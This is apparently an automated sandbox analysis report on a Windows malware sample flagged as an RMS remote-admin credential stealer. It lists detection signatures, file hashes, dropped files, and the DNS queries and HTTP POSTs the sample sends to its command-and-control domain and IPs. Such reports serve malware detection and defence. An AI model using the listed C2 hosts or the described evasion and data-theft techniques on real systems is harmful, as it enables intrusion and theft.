Analysis Report 1wOdXavtlE.exe

Overview

General Information

Sample Name:	1wOdXavtlE.exe
Analysis ID:	383846
MD5:	a7e67e6abd539aeddbb9021d23f6f217
SHA1:	cea85a6d9e417f2b8c2b3962a1359defc096e502
SHA256:	f1849f447bfa07c3a9a9db11501a026d133541d0264424198f297f5ec70e1ff3
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

RMSRemoteAdmin

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Connects to many ports of the same IP (likely port scanning)

DLL side loading technique detected

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses regedit.exe to modify the Windows registry

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected RMS RemoteAdmin tool

Classification

Signatures

AV Detection:

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\is-PFD3D.tmp	ReversingLabs: Detection: 55%
Source: C:\ProgramData\is-R3F67.tmp	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\servs.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Metadefender: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 1wOdXavtlE.exe	Metadefender: Detection: 16%			Perma Link
Source: 1wOdXavtlE.exe	ReversingLabs: Detection: 58%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1wOdXavtlE.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: 1wOdXavtlE.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,	17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,	19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,	19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	19_2_00641778

Networking:

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 86.107.197.8 ports 1,2,3,4,8,38214

Performs DNS queries to domains with low reputation

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	DNS query: pokacienon.xyz

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49761 -> 86.107.197.8:38214
Source: global traffic	TCP traffic: 192.168.2.6:49763 -> 195.54.160.9:32972

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: pokacienon.xyzContent-Length: 1137076Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: pokacienon.xyzContent-Length: 1137062Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyUpdate"Host: pokacienon.xyzContent-Length: 1137088Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 86.107.197.8:38214Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 195.54.160.9:32972Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 86.107.197.8:38214Content-Length: 856112Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 86.107.197.8:38214Content-Length: 856098Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"Host: 195.54.160.9:32972Content-Length: 23182Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 195.54.160.9:32972Content-Length: 23168Expect: 100-continueAccept-Encoding: gzip, deflate

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.192.141.1 104.192.141.1

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 195.54.160.9
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8
Source: unknown	TCP traffic detected without corresponding DNS query: 86.107.197.8

Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000002.465315065.00000221A3B13000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-01T08:42:55.8407457Z\|\|.\|\|646da06c-a69a-4aff-bcc8-3f5a349348ca\|\|1152921505693336001\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.450300636.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JEc equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000F.00000003.442264061.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"Ingesti